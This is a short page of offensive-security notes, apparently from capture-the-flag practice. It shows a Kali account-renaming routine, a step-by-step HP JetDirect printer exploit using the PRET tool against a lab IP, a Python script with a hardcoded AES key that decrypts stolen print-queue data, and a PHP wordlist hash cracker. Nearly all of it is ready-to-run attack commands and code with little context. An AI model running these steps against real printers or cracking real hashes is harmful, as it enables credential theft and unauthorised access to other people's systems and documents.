Steinz Security

  CTRL + ALT + F1           #Go to TTY1 sudo adduser TempUser      #create a new user account sudo adduser TempUser sudo      #Giving Sudo Privs  exit  and login with TempUser sudo usermod -l newUsername kali           #most likely this fails, need to kill some running process kill PID                                  #kill the running process of Kali Account        sudo usermod -d /home/newHomeDir -m newUsername sudo deluser TempUser      sudo rm -r /home/ TempUser      CTRL+ALT+F7  LOGIN WITH NEW ACCOUNT  

  HP Jet Direct Exploit - Port 9100 git clone https://github.com/RUB-NDS/PRET.git ./pret.py 10.10.10.201 pjl go to queued file and download it . get queued nvram dump          #Ram Dump for creds sed -e "s#’##g" queued | cut -c2- > queued.b64 cat queued.b64 | base64 -d > somefile.raw decrypt_printer_queue.py import io, sys, base64 from Crypto.Cipher import AES with io.open('somefile.raw', 'rb') as fp:         c = fp.read()[8:]         iv, ct = c[:16], c[16:] cipher = AES.new('13vu94r6643rv19u', AES.MODE_CBC, iv) z = cipher.decrypt(ct) sys.stdout.buffer.write(z) python3 decrypt_printer_queue.py > newfile file newfile newfile: PDF document, version 1.4 mv newfile newfile.pdf  

<?php $hash = 'e626d51g54t54765a88396c35d05'; $wordlist = fopen("/usr/share/wordlists/rockyou.txt","r"); $count  = 0; $start_time = microtime(true); while(! feof($wordlist))  {     $str = fgets($wordlist);   $str = trim($str);   $genhash = md5(crypt($str,'fa'));   if($hash == $genhash){     echo "Password Found: ". $str."\n";     $end_time = microtime(true);     $execution_time = ($end_time - $start_time);     echo "Tried Passwords:=". $count."\n";     echo "Time taken in cracking = ".$execution_time." sec";     fclose($wordlist);     exit(0);   }   else   {     $count = $count+1;   }   } fclose($wordlist); ?>